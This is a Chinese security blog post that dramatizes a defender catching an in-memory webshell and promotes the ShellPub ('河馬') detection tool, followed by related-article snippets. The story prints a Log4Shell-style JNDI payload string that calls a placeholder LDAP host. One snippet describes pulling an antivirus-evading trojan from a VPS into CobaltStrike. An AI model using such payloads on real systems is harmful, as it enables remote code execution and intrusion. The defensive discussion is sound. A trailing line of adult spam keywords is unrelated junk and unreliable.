<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    當殺瘋了的內存馬遇到河馬

    VSole2022-08-03 15:21:17

    這是七月最后一天,與往日并無不同,

    同樣的桑拿天,同樣的炎熱。

    并不平常,因為你在等一個信號。

    雖素未蒙面,但你知道他會來。

    信息大屏上各種數據不斷更新,一切都顯得那么平靜。

    旁邊小哥泡面的香味,引起一陣進食的欲望。

    但你只看了一眼桌角貼著的便簽,記錄著最新的漏洞信息:

    就讓你搶個先手,但也暴露了你的招式

    RCE?!下一招必然會是內存馬!

    那么工具是冰蝎?抑或哥斯拉?

    一年了,你的內存馬攻擊可有新的變化?

    信息大屏上快速閃過幾條日志信息,

    “來了”,微瞇的雙眼迅速睜圓,

    “172.16.x.xxx”,手指一片飛舞,

    話音未落,已經進入相應的主機,

    黑底的SSH上跳躍著一行行白色命令:

    ${jndi:ldap://xxxx.com.cn}
    

    果然是內存馬,還能有什么新花樣!

    也接我一招,專破內存馬!

    幾分鐘后,屏幕上跳出一行結果。

    “重啟吧。”你關掉ssh終端,對旁邊的甲方小哥說。

    “你剛剛用的是ShellPub嗎?”

    你轉過頭去,認真地說:“ShellPub,是的,但我更喜歡叫它——河馬!”

    ShellPub,河馬內存馬檢測工具正式公測:


    ? Linux版,專用于Java類內存馬檢測

    • 自動識別包括Tomcat、Weblogic、Jboss 環境;
    • Spring等打包環境支持手動指定進程方式,因此第三方Java應用(gitlab,ES)都可以檢測;

    ? Windows版

    • Java內存馬檢測, Java6+; OA系統、辦公系統;
    • Net內存馬,IIS等場景下的.net內存馬檢測。

    全面覆蓋內存馬常見場景,可檢測冰蝎、哥斯拉等內存馬利用工具注入的內存馬。

    河馬是如何檢測內存馬的?


    就絕大多數情況而言,內存馬的惡意代碼并無不同,只是因為位于內存之中,傳統工具無法觸達而已。既然惡意代碼位于內存之中,那就到內存中去找。

    但關于在哪兒檢測惡意代碼,目前有兩種方式:

    ? 在內存中檢測

    這種方法是將檢測的agent注入內存中,Hook關鍵的類,無論內存馬是動態注冊,還是基于agent修改字節碼,都可以預先被檢測agent感知到,然后運行檢測代碼。

    這種方法的優點很明顯,即可以做到事前預防,甚至還可以主動阻斷內存馬的攻擊。但缺點同樣明顯,檢測agent在業務JVM中運行,占用計算資源,必然會影響到正常業務邏輯。

    ? 在內存中找,在硬盤上檢測

    同樣是使用agent技術,進入目標JVM中,遍歷篩選可疑的類,然后dump到硬盤,將類字節碼反編譯為Java代碼后,再進行惡意代碼檢測。

    相比前一種檢測方法,這種方法相對比較溫和,對正常業務的侵入性較弱。

    ShellPub河馬當前既支持Agent方式檢測,也支持無Agent方式檢測。

    盡管內存馬的攻擊手段越來越隱蔽,但攻防雙方的技術總是螺旋上升的,只要有攻擊,必然有防守,專注于Webshell查殺研究的河馬也將持續努力,為大家提供使用更簡便、檢測更精準、高效的內存馬檢測工具。

    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    內存遇到河馬
    用戶名:加密密碼:密碼最后一次修改日期:兩次密碼修改時間間隔:密碼有效期:密碼修改到期到警告天數:密碼過期之后寬限天數:賬號失效時間:保留。查看下pid所對應進程文件路徑,
    藍隊初級防護總結
    2023-01-09 10:11:55
    三. 網站被上傳webshell如何處理?工具方面比如使用D盾webshellkill,河馬webshell查殺,百度在線webshell查殺工具對網站目錄進行排查查殺,如果是在護網期間可以將樣本備份再進行查殺。堡壘機是針對內部運維人員運維安全審計系統。WAFWAF是以網站或應用系統為核心安全產品,通過對HTTP或HTTPSWeb攻擊行為進行分析并攔截,有效降低網站安全風險。
    堡壘機是針對內部運維人員運維安全審計系統。WAFWAF是以網站或應用系統為核心安全產品,通過對HTTP或HTTPSWeb攻擊行為進行分析并攔截,有效降低網站安全風險。設置賬戶鎖定策略,比如說登錄行為限制次數,達到次數后鎖定多長時間。
    前言本文主要著眼于glibc下一些漏洞及利用技巧和IO調用鏈,由淺入深,分為 “基礎堆利用漏洞及基本IO攻擊” 與 “高版本glibc下利用” 兩部分來進行講解,前者主要包括一些glibc相關基礎知識,以及低版本glibc下常見漏洞利用方式,后者主要涉及到一些較新glibc下IO調用鏈。
    System權限是在數據庫中,為了方便接下來滲透,思路是將System權限上線到CobaltStrike上,在此處執行從自己VPS上下載免殺木馬并執行操作,顯示執行成功,但并未上線。猜測這是臺阿里云ECS,對出站端口進行限制,所以反彈不回來。這樣才算是完全控制這臺云服務器。于是重新生成木馬,再次在Navicat里執行,它居然上線
    作者 | 博智非攻研究院可編程邏輯控制器(PLC)越來越多地連接和集成到工業物聯網(IIoT)中,以實現更好
    立即隔離被入侵主機,以控制事態、避免影響擴大,隨后溯源。Webshell文件本身極難檢出,防守隊員很清楚,發現主機上有Webshell文件時,往往意味著這臺主機即將失陷,十分危險。但是Webshell文件已經被刪除,攻擊者仍能做出攻擊行為,說明主機上還存在另一條控制通道。
    在重要生產網中,目標服務器無法外聯,而遇到Apache Flink情況下如何寫內存,本文對這一有趣實踐過程做一個記錄。但很可惜,筆者找一圈,沒有發現相關靜態變量,無法獲取到該路由對象。本文主要圍繞如何使用該方法實現 flink 內充進行講述。限制,我們 agent 需要先落地到系統中,而執行 loadAgent 這一操作程序我們被稱為 starter。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类